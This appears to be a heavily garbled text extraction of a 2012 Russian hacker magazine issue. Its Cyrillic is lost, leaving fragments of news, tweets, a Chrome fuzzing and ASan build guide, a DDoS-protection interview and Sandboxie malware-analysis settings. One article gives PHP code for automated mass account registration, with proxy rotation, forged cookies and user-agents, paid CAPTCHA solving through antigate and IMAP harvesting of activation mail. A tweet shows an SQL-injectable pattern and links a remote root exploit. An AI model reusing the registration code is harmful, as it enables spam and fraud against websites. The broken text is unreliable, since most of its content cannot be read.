Вы находитесь на странице: 1из 148

-

030

WWW.XAKEP.RU

02 (157) 2012

MONGODB

: 230 .
024

DDOS

HIGHLOAD LAB
040

CHROME
$270.000

GOOGLE
.
,
GOOGLE CHROME.

ANDROID

018

082

:
1986-2011

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

Intro

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

UNIXOID SYN/ACK
MALWARE

PR-

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)


PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906




-

DDOS



.
- QRATOR,
- .
: 100 100%
.
,
.

Highload Lab, , . ,
- -
. , :
,
.
:
- : ,
. :
DDoS $50 , DDoS' $1500. ,
: 50
, $160 .
: ,
,
$160
. DDoS
:(.

.: (495) 935-7034, : (495) 545-0906


TECHNOLOGY

(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)

(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)

(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)

(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2012

nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag

02/157/ 2012

001

Content


, .

010

HEADER
004
011

MEGANEWS

hacker tweets
-

016
017



Proof-of-concept
Excel

COVERSTORY

024

AntiDDoS
Highload Lab

DDoS'.

COVERSTORY

COVERSTORY

018

030


Google Chrome

-

058

104

PCZONE
036

040
044


Sandboxie

Android x86
Android
?

UNIXOID
104

110

SYN/ACK

116
048
052
058
064
070

Easy-Hack



MongoDB
NoSQL
: ?
Remote Control System
X-Tools

072

ZeroNights 2011

-

122
126

132
136

080
082

088

094
100

C/C++


HOW-TO: PE-


Sandy Bridge
AMD A75
Samsung RF712-S01
!

138

. !


VBR-
, BOOT-


Linux-


Windows Server 8
IT-
IDS/IPS

FERRUM

MALWARE
074

open source 2011


open source


OpenSSL OpenSSH,

142
143

116

FAQ UNITED
FAQ

8.5
WWW2
web-

MEGANEWS

21
( ) Windows 8,
Microsoft.

Marriott
400 . 1
.
,

, .

, , ,
. ,
?
, 26 ,
. Marriott ( , ,
) .
. .
Marriott, , IT- !
, Marriott
. , HR, e-mail . ,
, ,
. , ,
. , , .
, .

45 /
DDOS-, Prolexic.

,
DDoS .

004

Walt Disney
Apple

2670
$375 .

GOOGLE+
:
.
,
.

,
Crypteks,
.
,

. ,

, 26 .
12 ,
.
,
,
256- AES-.
, .
Crypteks
24 / 10 /.
. Crypteks USB 8
130 , 16 160 .
4 , , .

MCAFEE ANDROID
.
,
Android 37%

2011 .

MYSQL.COM SQL, D35M0ND142.


, ,
.

02 /157/ 2012

MEGANEWS

- MICROSOFT OFFICE 15 , 2012-.

DNS-
OPENDNS
MAN-IN-THE-MIDDLE

DNSSEC
,

DNS. DNSCrypt


DNS-

OpenDNS (
,
OpenDNS).

OpenDNS DNSCrypt ,
DNS (man-in-the-middle,
).
DNS. SSL
HTTP-. DNSCrypt DNSSEC,
, , .
DNSCurv,
DNS, DNSCrypt ,
, . DNSCrypt
DNS DNS-. DNSCrypt
Curve25519 ( )
RSA. DNSCrypt, , , OpenBSD, NetBSD, Dragonfly
BSD, FreeBSD, Linux Mac OS X. DNSCrypt , , Unbound, PowerDNS dnscache.
, , Mac OS X.

,
SAMSUNG 2012


10"
006

CARRIERIQ

-


- Android-
. ,
androidsecuritytest.com. ,
CarrierIQ , ,

. ,

Android, RIM Nokia ( ).
, CarrierIQ
- (Cease&Desist).
, ( , ),
.
Electronic Frontier
Foundation, ,
,
. CarrierIQ .

,
. EFF
,
.
,
, .
.
YouTube (youtu.be/T17XQI_AYNo),
,
. ,
CarrierIQ
SMS,
. Wi-Fi-
Google. , CarrierIQ
.
(hello world), , SSL. ,

SMSNotify, CarrierIQ?
,
Wi-Fi- , HTTPS?, .
. ,
, CarrierIQ , ,
, 141 ,
. Apple ,
CarrierIQ iOS.
, ,
, , . , , , ,
. ,
CarrierIQ,
CarrierIQ, .

02 /157/ 2012

MEGANEWS

MICROSOFT, DVD 53 % , 44 % 43 % .


2011
BIT9

SOPA

RUTRACKER
SOPA (STOP ONLINE
PIRACY ACT)



Stop Online Piracy Act
(SOPA),

.

,

,
(,
AdSense),
ISP . , SOPA
DMCA,
,
,
. MPAA RIAA , SOPA
. - ( rutracker.org
demonoid.me) -. ,
,
.
,


. -,
Google, Yahoo, Facebook , ,
.

,
Bit9,
:
1. Samsung Galaxy
Mini.
2. HTC Desire.
3. Sony Ericsson
Xperia X10.
4. Sanyo Zio.
5. HTC Wildfire.
6. Samsung Epic 4G.
7. LG Optimus S.
8. Samsung Galaxy S.
9. Motorola Droid X.
10. LG Optimus One.
11. Motorola Droid 2.
12. HTC Evo 4G.

Bit9
. ,
, .
,
Android. 13 iPhone 4 .
black list , ,
, .
Samsung Galaxy Mini,
HTC
Desire Sony Ericsson Xperia X10 .
Android
? Bit9 , 56 % (!)
Android, ,
. , Samsung, HTC, Motorola
LG, .
Android.

008

EDIFIER R2500
Edifier International Ltd.
2.0. Edifier R2500.
.
USB , SD , FM- AUX
.
50 .
5 - , 1- 2 (
). Edifier R2500
, .

ID
SOFTWAREI
Doom III .
.


:
crypto-class.org.

, tcpcrypt.

02 /157/ 2012

MEGANEWS

APPLE, iTunes, 2008 FinFisher.

?


,
, smart
grid TCP/IP-
. 1015,
.
Stuxnet , , .
. , , , ?
?
,
.
.
, -
.

SCADA- 1998 , .
2011 . ,
SCADA- Curran-GardnerWaterDistrict
( ),
.
IP-. . , SCADA
- .
, ,
SCADA-
,

. -

.

pr0f, ,
SCADA- (). . , .

.
,
.
IP-
, .
.
,
. , - . Pr0f
, SCADA-

. ,
?



Pure System,
.
:
1) ;
2) ;
3) ;
4) .
Pure System,
Yves Rocher , -

010


.
.
, , ,


.
.

02 /157/ 2012

(@asintsov)

#hacker tweets
@mckt_

@bobuk

:
.

if(user.followers == 0 && user.


following > 50 && tweet.mentions
> 3 && tweet.has_link){tweet.
is_probably_spam}

@d0znpp

SQLi : $id=$_GET['id']; $o=new


Object($id); SELECT ... WHERE
id=$id;

@mikko:


Wi-Fi '5.99 /'. , ,
, .

@Dabeaz:

.
,


.

@dlitchfield:

11gR2
secalert_us@
oracle.com
24 ... ? ;-)

@ABazhanyuk
FreeBSD ftpd and ProFTPd on

FreeBSD Remote r00t Exploit:


http://www.exploit-db.com/
exploits/18181/


Oracle.
, ,
, ,
0day (, BlackHat)

@kevinmitnick:

GPS
spoofing .
, Stuxnet?

@ortegaalfredo:

,

, ,
.

@toxo4ka:

@alexmImmunity:
@thegrugq:

:
?.
,
, : 1)
2)
escape-

.
Perl,
.

@DeathStarPR:
@cesarcer:

@thegrugq, ,
.
calc.exe

Perl
sqlninja.


.
.
.

Siri,
.
. , , Siri!

.
@d0znpp

@sschillace:

- SOPA 5
,
, ...
:

SOPA Stop Online Piracy Act.


,
.

02 /157/ 2012

@L4merS3C:

: ,
IPS, WAF, NAC. , ,
, , .

@aaronportnoy:

SCADA, ,

.

, , ,
?debug=true. LOL #-

@hdmoore:

BSD Telnet:
http://bit.ly/s8yy9X <
FreeBSD 5.3 -> 8.2 Red Hat Enterprise
Linux 3.

011

MEGANEWS

33 Android.SmsSend Android Market.

LINUX MINT 12

HDCP -

LINUX-
,
Mint
32- 64
x86-

: 512
( 1
), 5
,

800x600
. Linux Mint 12
.

Linux Mint
,
Ubuntu.
Linux Mint 12, Ubuntu 11.10 Lisa,
Gnome 3,
. ,
Gnome 2, Gnome 3.

.
Mint Linux (linuxmint.com), :).
, , Linux Mint
, , Linux DistroWatch, , Linux Mint, . , Unity,
Ubuntu Gnome KDE.
-, ,
.
, Gnome Gnome 3,
Linux Mint Mint Gnome
Shell Extensions Linux Mint 12
,
.

99 188

.

012

COMSCORE, 1217


25 % .



e-mail.
..

INTEL
HDCP

, HDCP,
Intel - ,
HDMI, .
- HDCP,
Intel .
Intel ,
, HDCP-
. , Intel ,
.

() , Intel . :)
,
Digilent Atlys
(FPGA), HDMI RS232
.
$200.

ReConFig 2011.

,
, 1 500

. .

INTEL 120 ,
x86
Atom Android 4.0.

02 /157/ 2012

16 QUAKE , , .

EZ-ROBOT

VIII

,
2011 (premiaruneta.ru).
VIII :
35 .
.
:
( i-Russia.ru);
( www.vtbrussia.ru);
(www.infosud.ru).
.

, , :
Google (
);
( );
- (www.NetPolice.ru).

:
.;
.;
-..
:
- (chaskor.ru);
;
(- www.NOW.ru);
(rg.ru).
:
- (caramba.tv);
. (www.budist.ru);
(www.nalogia.ru).
:
Mail.ru Group ( Russian Code Cup);
-.;
.
(gramota.tv);
LiveLib.ru.
:
- OZON.travel;
AMF.ru;
(vitaportal.ru).
.
-
2011.
: : World
of Tanks. ,
, narod.premiaruneta.ru.
:
1- ( );
Free-lance.ru;
BFM.ru.
:
-
(SoftKey.ru);
();
(habrahabr.ru);
;
.

,
,
,
iRobot Roomba

,
,

,

ez-robot.com.


EZ-Robot Complete Kit EZ-Robot. , $243,
. , , , ,
.
,
( GUI,
, ). , ,
, . HTTP--
, iPhone, Android .
, , . ,
.

PHOENIX TECHNOLOGIES WINDOWS 8

SCT 2.2
60
,

,

. .
02 /157/ 2012

013

MEGANEWS

13,2 Maple Story. .

0DAY
ADOBE

! GOOGLE
BING

P2P- YACY

:
YaCy (yacy.net),
Google, Yahoo, Bing
.
, P2P,
YaCy
, , . ,
, . Freeworld , GNU/Linux, Windows MacOS. , YaCy
Diaspora,

Facebook, Google+ . . P2P-
.
,
. YaCy , ,
. YaCy Free Software Foundation Europe (FSFE).

Adobe

U3D memory
corruption
vulnerability.
U3D

Universal 3D

.
,
PDF-

U3D,

.

Adobe Reader Acrobat! ,


. Adobe Systems
. Adobe Reader X ( 10.1.1 ) Windows Macintosh,
Adobe Reader 9.4.6 Unix, Adobe Acrobat X ( 10.1.1
) Windows Macintosh. -
, , . ,
0day. Adobe, . , ,
: Adobe ,
Lockheed Martin MITRE.
, ,
MITRE, Defense Security
Information Exchange , . Reader
Acrobat 9 , Reader Acrobat 10 (
Mac OS X Unix) .

WEXLER.
BOOK T7005 7- LED . 8 ( 32
MicroSD) 2800
.
, , . DOC.
-,
WEXLER.BOOK T7005 .
720p.

G-.
3 990 .

014

GOOGLE ,

Android Market
.
Market

.

NOKIA -
MAIL.RU GROUP
.
27
Nokia Series 40.

02 /157/ 2012

26 % , .

WEBOS
HP
, HP .

webOS , , ,
. , , webOS
Amazon Oracle. ,

Palm Palm OS. , 2010 Palm HP 1,2
.
webOS. Hewlett-Packard
- .
webOS , HP. ,
, , . -,
Android. , ,
, webOS, GPL, BSD Microsoft
Shared Source - . TechCrunch
HP , ,
webOS. , 2013 , 2012-
HP Windows 8.
, , Hewlett-Packard
TouchPad.
eBay,
. ,
, , , , -
( )


HP


ENYO
webOS.

.
.
. HP TouchPad 16 ,
$99, 15 . TouchPad
32 $149
, , ,
25 .
7850 TouchPad. , , (, -
), $79. , eBay ,
PayPal .
, TouchPad HP, .


$5000, ,
,

02 /157/ 2012

015

HEADER



, ,
portable-, .
. ,
(portableapps.com/ru).
,
Cameyo (www.cameyo.com) portable-
. : ,
,
. . ,
:). ,
.
,
, , VirtualBox Cameyo .
,
Portable-VirtualBox
(www.vbox.me).
VirtualBox
, USB-. ,
AutoIt (
bit.ly/rQ0n7Z), - , ,
. - . , ( Portable-VirtualBox_v4.1.6-Starter_v6.4.8-Win_all.exe)
.
Portable-VirtualBox.exe.
, - (,
) . .
-

, , Save the state,


. . . z

portable-

VirtualBox

016

VirtualBox . ,
, USB- (
). Download
installation files of VirtualBox, (, Extract the files for 32-Bit system) ,
.
( VirtualBox.xml),
Portable-VirtualBox.exe . VirtualBox. -
.
VirtualBox,
.
USB, .
(),
. Settings
Network Start VirtualBox with network support.
Portable-VirtualBox . ,
, , .
VirtualBox. , ,
, :
Portable-VirtualBox.exe "leopard"

02 /157/ 2012

Proof-of-Concept
EXCEL

-, Excel?
.
, ,
. ,
, - (
), .
, Excel , ,
Office VBA-,
? - -.

?
PoC Excel TaskManager.xls. :
-,

Excel- ,
,
VBA (Visual Basic
). ,
: List processes ( )
Execute commands ( ). , ,

( , ID ,
, ,
, ,
32 64 ).
,
, , .

TaskManager.xls

02 /157/ 2012

Command
(,
t)
Execute commands. .
, ,
.
winlocker' -.

Private Declare Function OpenProcess Lib


"kernel32.dll" (ByVal dwDesiredAccessas
As Long, ByVal bInheritHandle As
Boolean, ByVal dwProcId As Long) As Long


. ,
:
Private Sub TerminateProcessByID(
ByVal lProcessID As Long)

?

VBA. WIN32-
.

DLL,
:

VBA

hProcess = OpenProcess(
PROCESS_TERMINATE, 0, lProcessID)
If hProcess <> 0 Then
TerminateProcess hProcess, 0
CloseHandle hProcess
End If
End Sub

TaskManager.xls
32-, 62- ,
(
64- Office 2010) .
:
blog.didierstevens.com/2011/11/30/signedtaskmanager.
PoC,
. z

017

000, 00spersky Lab


(twitter.com/ax330d, onsec.ru)

COVERSTORY


Google
Chrome
WWW
bit.ly/rpBAH9
,

;
caniuse.com

;
bit.ly/taDA7s

Netscape;
bit.ly/alUyof Hall
of Fame;
bit.ly/kyBEkv
ASan;
bit.ly/oJnrhP

How Open
Should Open Source
Be?;
bit.ly/uQywEh

Grammar-Based
Interpreter Fuzz
Testing.

WWW


Chrome,

018

-

bug bounty,


.
Netscape
1995 , Mozilla
Google .
,
Google Chrome.
02 /157/ 2012

Google Chrome

GOOGLE
,
, .
Google Vulnerability Reward
Program.
, Google
Chrome .
, Hall of Fame,
,
.
,
, , .
, 2010
,
: $500, $1000 $1337.
, , ,


$3133,7,
$1000 ( , ,
).
Chrome

Chris Evans. Adam Mein
. ,
,
, , Browser crash in
HTML5 speech UI (crbug.com/68666). ,

02 /157/ 2012


.
:). ,
wushi team509
500, 509 , - . Google
.

.


,
.

: , , , , .

HALL OF FAME

Google Security Hall of Fame
.

, 60
(
).
270
!

,
.

, ,
,
, .
, , ,

,

.
!
, - :
;
(
);

().

- , ,
. ,
, ,
, ,
,
-.
, ,
.
, -
.
, -
?

019

COVERSTORY

.

,
-
.
W3C, - ,

. , ,

. ,
.
. :-)
CSS 3, HTML 5, DOM,
SVG, Canvas, Audio/Video, WebGL, Drag'n'Drop,
. Chrome, ,
WebP.




,
, - ,
XML-.
, .

,
C++ ( ,
, ).
,
- ,
. ,
,
,
- ,
? ,

,
. .


?
, . , Mozilla Firefox
CVE-2010-0179, Firebug,
,
CVE-2010-3773. ,
, ,
, .
,
, ,
.


. - Mozilla Webkit
-
, ZDI,
.
.

-

.
,
, ,
public ,

. Chrome, ,
, .
Safari ,
,
.



,
.

.
,
.
, ,
, .
,
- ,
, .

,

.

.
, , , ,
. ,
,
,
, ,
.

, . ,
-
,
, ,

. ?
,
,
,
, .

CHROME
Chrome,
,

, Chrome

020

02 /157/ 2012

Google Chrome



, .
.gclient,
:
"custom_deps" : {
"src/third_party/asan":
"http://src.chromium.org/svn/trunk/
deps/third_party/asan",

, ASan. ASan
Clang (bit.ly/mf7cuG). ./build/
install-build-deps.sh.
,
.
,
:

AddressSanitizer

: Windows ( 32 ), Linux Mac.



: -
,
. ,
GNU C, (crbug.com/48733).
.
canary
, dev, beta stable (
stable, beta
dev). ,
,
15
. ,

, !
,
.
,
.
Google Chrome ASan.
ASan? Address
Sanitizer,
, Valgrind.
Valgrind.
, ASan .
use-after-free, overflow/underflow
, , . , ASan
, Valgrind.

02 /157/ 2012

malloc()/free() ,
.
, .
, .
, ,
.
Chrome
, heap buffer overflow, use-afterfree - . ASan. .

-
,
. .
,
, Ubuntu 10.10, x64

export PATH=$HOME/depot_tools:$PATH
cd src
ASAN=`pwd`/third_party/asan
ASAN_BIN=$ASAN/asan_clang_Linux/bin
BLACKLIST="-mllvm -asan-blacklist=$ASAN/
asan_blacklist.txt"
CC="$ASAN_BIN/clang $BLACKLIST"
CXX="$ASAN_BIN/clang++ $BLACKLIST"
GYP_DEFINES='asan=1 linux_use_tcmalloc=0
release_extra_cflags="-g -O1 -fno-inlinefunctions -fno-inline" ' gclient runhooks

:
make -j16 BUILDTYPE=Release CC="$CC" \
CXX="$CXX" CC.host="$CC" \
CXX.host="$CXX" LINK.host="$CXX" chrome


. , ,
,
50
, 12 , .

-5 GOOGLE CHROME

1. (54 )
2. MIAUBIZ (49 )
3. AKI HELIN (24 )
4. KUZCC (22 )
5. CHRISTIAN HOLLER (19 )
021

COVERSTORY

,
:
ASAN_OPTIONS=stats=1 out/Release/chrome
--no-sandbox 2>&1 | third_party/asan/
scripts/asan_symbolize.py | c++filt

,
,
. ,
addr2line, ,

(
9 ). ,
,
:
out/Release/chrome --no-sandbox

, ,
.

,

(, , -

).

: cross_fuzz, ref_
fuzz, Canvas fuzzer Michal Zalewski, jsfunfuzz
Jesse Rudermann, BF Jeremy Brown.

: DOM, HTML, JavaScript,
canvas WebGL.


.
, jsfunfuzz.
,

.

Pwn2Own

022

WinDbg Stack overflow Chrome

.

./gclient sync.

.
,
bash-,
.
,
bit.ly/s9wt5F.
Open, ,
Closed, Chrome .
,

.
, ,
,
Chrome. ,
. Chrome
:
DoS use-after-free.
ASan, ,

, ?
, , Chrome. !
,
Proofof-Concept. ,
.
,
.
, ,
:
DoS, OOM , Stack
exhaustion (,
).
,
use-after-free
. - DoS
,
Security (
).

02 /157/ 2012

Google Chrome

, ,
, Aw,
Snap!. Chrome
,
. use-after-free,
, .
Valgrind ASan. ,
, ,
gdb WinDbg.
WinDbg .

RelaunchChromeBrowserWithNewCo
mmandLineIfNeeded, , , :
!sym noisy
.reload /d /f /o

,
,
, .
. ,
, .
, , . ,
. ,
,
,
. , . ,
, . ,
,
. ,
. ,
, ,
- . , , ,
. ,
,
.
. Chris Rohlf
, ,
. ,
, , crbug.com/63866.
,
-
. .
,
,
, ,
. . ,
, ,
.
( merge) . , ,

02 /157/ 2012

,
, .
, -, , . ,
, . ,

,
.


, .
, ,

, ,
. ,
, , -
,
. ,
. , -
, reward-500.
(Boilerplate
text) ,
,
.
,
Chris Evans

,
,
Google. , . , , , ,
, -,
, - . , ,
PDF-,
.

, . . ,
,
, ,
Google. . -
,
.


, Google Chrome, Hall of Fame
.
- , . -
, ,
. , ,
Google Chrome. z

Vupen Google Chrome

023

COVER STORY

Anti

DDOS-
. , ,
DDoS, , .
: ,
1998-!
DDoS
IT Territory 2003 ,
. ,
DDoS
. , . - , ,
-,
, .
, .

.
, .
, ,
.
-.
-?
: -,
, . , ,
.
?
, , ,
, .

024

02 /157/ 2012

DDoS- Highload Lab

DDoS
DDOS- HIGHLOAD LAB
, , ,
.
DDoS- ,
, ,
.
.
,
. , -
, .
, ,
, .
:
, ,
. WMZ, ,
. $30100
. ,
, ,
24/7 .
, , ,
.
, $100 .
.
, .
,
,

02 /157/ 2012

,

-. , - .

, -
, - !
,
, ,
,
.

DDoS,
-
. DDoS-

,
.
DDoS , ,
. De facto
.
.
,
. , DDoS -
.

Slon.ru. , ,

. . ,
, . ,
,
application-. , ,
200270 .
DDoS- -
.
Lineage II.
,
.
ICQ - ,
, (!),
, , !
Lineage!
DDoS- ,
. , ,
.
-, , , ,
DDoS-. , , , ,
.

DDOS
? ,

.

025

COVER STORY
- .
ICMP spoof, DNS amplification, TCP
SYN flood, TCP RST flood
.
, .
.
:
,
( /),
( ), ( TCP/IP).
.
? ,
. , , ,
( ).
- . , , .
,
,
EDGE, GPRS.
- ,
outflow .
.
, TPC/IP.
SYN-, RST-
FIN-way , , ,

, .

DNS amplification.
IDP based handshake,
N N
x K. IP-,
,
,
IP- .

. DNS
UDP 53, ,
.
, .

K ,
- . , , K
. NTP,
,

026

, , .

SYN-
TCP-.
, -, 1982 . ,
. . - SYN-
, , .
10 .

, ,
DNS
IP- ( ). ,
IP ,
,
, IP iptables
IP-, .



sequence- ( ,
,
)
. ,
. , , ,
, , . .

DNS, .
.
:
. .

, . TCP/IP-, ,
, ,
,
.
,
. .
DNS amplification
.
,
:
, - IP-.
?
56 clustery sort
. ,
.
, ,
. , - ,
, .
,
, 200
, get , ,

.

DDOS
.
.
, DDoS, ,

Qrator
. ?? !
, , ,
, .
,
.
.

.
. ,

.
,
- -.
,

. ,
, . .
, ,
, , , ,

- .
,
... , .
.

.

DDoS-. , .
, Cisco Guard
( ,
), .
, , false positive
, .
( ), , .

02 /157/ 2012

DDoS- Highload Lab

, , NAT,
,
.
.
, 30, 40 100
.
Cisco Guard :
,
,
, ,
.
, DDoS-
,
.
, .
,
: ,
, . Qrator
,
.
, ,
- . - .
Arbor,
10 . ,
... 10
/c .
: .

TCP- .
, -, . ,
- .
,
UDP ,
ICMP ICMP .
57
. , .
,
,
100
.
DDoS- ,
.
Qrator ( )
Arbor , .
BGP-AnyCast,
. public exchange
,
.
.
, -
.

02 /157/ 2012

. ,
. ,
.
, ,
BGP.
,

.

, .
TCP/IP, Free BSD Linux
,
.
TCP/IP,

, TCP.

TCP/IP-,
,


, Linux.
,
,
.
TCP- TCP-, ,
,
\ .
6 .
.
, -.
, , ,
2008 (
highloadlab.ru).
, ,
.

DDoS,
Highload++ 2009 .
,

. , ,
.


DDoS
, .
, ,
.

.
,
:
1. . .
2. . .
HTTP-, .
, , JS-
.
3. . ,
, .
,
.
4. .
.
5. .

, ...

. ,
, 75 ,
. - .
,
,
.
, .
- Java-,
, cookies.
20- , , . , ,
,
LAMP Stack (Linux, Apache HTTP Server, MySQL
PHP). 2010
3040 .
2010- P2P. :

027

COVER STORY
- , 1020 ,
.

,
, .
MinerBot,
BitCoin.
, ,
Cisco Arbor.
MinerBot,

, .
. 2009 ,
1500 ,
.

. ,
,
.

,
. ,
-
. ,

, , .

. .
-
.
, .
: Windows XP
SP1 IP-.
, - , -?
. ,
,

. ,
, ,
.
, .

. . :)
,

028

, ,
,
,
Windows-.

HIGHLOAD LAB
DDoS-
. ,
- .
, , ,
.
-
,
.

. , .
2008 . 2009
- ,

2010 . .
,
, . , ,
. . :)
: 2010 ,
10
, 12,5 . , ,
,
. , ...
- ,
. .
-. 1 , 2
6
. -.

. ,
.
: -
. ,
, ,
, Qrator.
,
.
12 .

. . , ,
.
, ,
,
( ).
, , ,
.
.
. - , .
,
, , . ,
, . .
Highloadlab .


: , .

. .
DDoS- 50100 ,
, ,
.
5000 .
, .
,
.
.
, New Times,
golos.org, , ,
Forbes, Public Post, ... ,
.
. .

.
,
,
, -
-.
, , , , ,

. .
, . z

02 /157/ 2012

DDoS
: -
, . DDoS-
Highloadlab.

DDoS-

DDoS- 2011

1861

1905

340

34

1 /


:
437
392

303
56 /

486 .

239 991

DDoS-?

87
22
85
103

89
52
85
DDoS



:)

143
107

* 2011

02 /157/ 2012

029

COVERSTORY

|qbz|



-

.

, ,
, .
,

.


.
030

- , , ,
- .
, ,
, ,
-.
. ,
,
cURL, -.
,
.
,
. , , .

DVD


,
.

,
IP- ,
.
,
c cURL:

02 /157/ 2012

curl_setopt($c, CURLOPT_PROXY, $proxy_address);

.
, ,
.
.
( , ,
).
:
, IP- . ,
, ,
cookie.
:
$cookie_session = array(
'BIRTHDAY='.rand(1,29).'-'.rand(1,12).'-'.rand(1960,1985),
'IS_18OLDER=1',
'LANG=en'
);

, ,
, . , , ,
e-mail, , .
, ,
, 20 . :)

- . . ,
, .
. , .
,
. , , .
Ajax, .
, . , ,
,
.

CAPTCHA'


.
, , , . ,
, .
,
.
, ( User-Agent)
,
.

-, . :
include('./useragents.lib.php');
$chosen_useragent = chooseBrowser();

, 150 . . ,
cookie. ,
, ,
(User-Agent),
, .
cURL cookie-,
, . -
, , ,
.

02 /157/ 2012

, , , . .
. ? ,
, , , .
, , ,
. ( -) . ,
,
, .
1 : 3, .
(
),
, , JavaScript-,
--, .
? 100 1000 , 1000
20 ,
.
?
, ,
. , , ,

031

COVERSTORY
( ).
(headers), , .
/
, ,
, . ,
. :
,
.

CAPTCHA
,
.
:
function loadIndex(){
global $chosen_useragent, $cookie_session;
$list = parseRequests(
file_get_contents('./index_map.txt'),
$chosen_useragent,
'Cookie: ' . implode('; ', $cookie_session));
$links = array(); $heads = array();
foreach ($list as $link => $head){
$links[] = $link;
$heads[] = $head;
}
$paged = cM($links, $heads, 1, 1);
}

HTTP-

, . .
LiveHTTPHeaders
Mozilla Firefox ( Opera Dragonfly )
,
.
, .
.
-
, ,
, () ,
(
,
).

$list = parseRequests(
file_get_contents('./index_map.txt'),
$chosen_useragent,
$cookie);

, .
curlMulti() .
,

032

, index_map.txt
, Firefox . , ,
, , ,
, , . .
.
- LiveHTTPHeaders ,

$paged = cM($links, $heads, 1, 1);

$paged = cM($links, $heads, 1, 1, 'captcha.php');


list($c_url, $sid) = explode('captcha_sid=', $links[11]);
return array(
'sid' => $sid,
'image' => base64_encode($paged[11])
);

, . $links[11]
$paged[11] 12- , , (
).
sid, .
.
antigate.com,
($1 1000 )
.
API- ,
, . :
$captcha = loadReg();

02 /157/ 2012

$local = md5($captcha['image']);
$write_c = fopen('./captchas/'.$local.'.jpg', 'wb');
fputs($write_c, base64_decode($captcha['image']));
fclose($write_c);
$cresult = recognize('./captchas/'.$local.
'.jpg', 'e12dc4858bac1f4ee338c577f9d300');

$cresult.


- , .
, .
:
1. ,
. ,
,
- (
) .
2. , ,
, , . , , 123@
. 234@., , ,
.
.
3. ,
. mailinator.net
, .
,
( !) . 11 .

.
? , ,
. ,
,
, -

PHP IMAP. ,
-,
, , . ,
.
:
function getMessage($login, $password){
$imap = imap_open(
'{mail.rambler.ru:110/pop3/notls}INBOX',
$login,
$password);
if ($imap){
$body = imap_qprint(
imap_body($imap, (imap_num_msg($imap) - 1)));
}
else{return false;}
return $body;
}

02 /157/ 2012

033

COVERSTORY
. , ,
, , .
, , .
:
$password = substr(md5(time()), 0, rand(6, 10)).rand(10,99);

, ,
LiveHTTPHeaders.
POST-, multipart/formdata.
POST- (CURLOPT_POST, CURLOPT_
POSTFIELDS).
ContentType , multipart/form-data boundaries.
-, MySQL, . , , -, . ?
, ,
. ,
,
. , , ,
.

. ,
:
$activation = getMessage($email_login, $email_passw);

,
.
( referer user-agent,
). , :
- ,
.

. , . ,
, , Ajax
.
cURL. .
? , ,
, sleep() ,

, ( ,
)
JavaScript, - . cron -
.

?
?
. , , .
, .
, -
, .
.
, , ,
, . , ,
,
,
. , ,
:).
,
. ,
: , , , , IP-, ,
. , .
. ,
, . z


, ,
. -, JavaScript',
, -, , ,
,
- .

034


, Facebook, YouTube ,

. JavaScript' ,
,
.



. ,
, ,
.
, ,
.

02 /157/ 2012

Preview

30 .
.

PCZONE
40

ANDROID PC

,
. , aircrack .
Windows
,
.
,
.
Android- , ,
, ?
?
.

PC ZONE

36


,
sandbox ,
.

72

ZERONIGHTS 2011
,
,
0day-
.

02 /157/ 2012

44

?
,
. :
GitHub, BitBucket, Assembla
SourceForge?

58

MONGODB
SQL

.
NoSQL.

MALWARE

74

. !
?
HIPS .

82


, ,
- MS-DOS .
26 .

035

PC ZONE

Gray Jack the Fixxxer


SANDBOXIE



:
(sandbox).


,
,
.
.


,
,
. ,
,
.
,
, ,
. ,
,
.

,

036

, . ,
,
,
.
, , :
Anubis (anubis.iseclab.org), CAMAS (camas.
comodo.com/cgi-bin/submit), ThreatExpert
(www.threatexpert.com), ThreatTrack (www.
threattrack.com).
,
:
.

WARNING




!

.

( ).
, , , .

( ).

(, ).
,
,
( ).
, -.

02 /157/ 2012


,
. .

,
. ,

,
,

.

.


,
Sandboxie.
-
(www.sandboxie.com).
.
,

. :
Sandboxie
user mode.
. ,

.
kernel mode, , .
Sandboxie
,
. , ,

, . ,
Pinch, ,
ftp ,
Sandboxie

Sandboxie

! ,
.

SANDBOXIE
Sandboxie .
, .
Sandboxie
.
.
.
, ,
,
.
,
, . :
1. , .
2.
/ .
, 1 2,
,

.
3. ,

.

, .
, , ,
,
. , ,
, .
4.


,
.



,
. , Sandboxie

.
. ,

.
,
.

Buster Sandbox Analyzer

02 /157/ 2012

:
API- .

.
.
( , VirusTotal ,
PEiD, ExeInfo ssdeep . .).

-

(,
Process Monitor) .
:
,
kernel mode ( ).
(
).
,
Sandboxie. Buster
Sandbox Analyzer , .

037

PC ZONE
1. Buster Sandbox Analyzer (bsa.isoftware.nl).
2. SBIExtra (bit.ly/rDhDba). ,
:
;
;
BlockInput ( );
.
3. Antidel (bit.ly/upYAfY).
, .
, , , .
?

Sandboxie,
. ,
Sandboxie, Plugins .
: Buster Sandbox Analyzer

LOG_API*.dll,
. : Verbose
Standard. API, , ,
.
,
.
, ,
-
, Verbose.
.

, : LOG_API_VERBOSE.dll
, LAPD.dll.
Sandboxie
.

.
:
FileRootPath
[GlobalSettings]
,
,
.
FileRootPath=C:\Sandbox\%SANDBOX%.
[UserSettings_XXXXXXX] .
,
(
BSA). :
[BSA]
InjectDll=C:\Program Files\Sandboxie\
Plugins\sbiextra.dll
InjectDll=C:\Program Files\Sandboxie\
Plugins\antidel.dll
InjectDll=C:\Program Files\Sandboxie\
Plugins\LAPD.dll
OpenWinClass=TFormBSA
Enabled=y
ConfigLevel=7
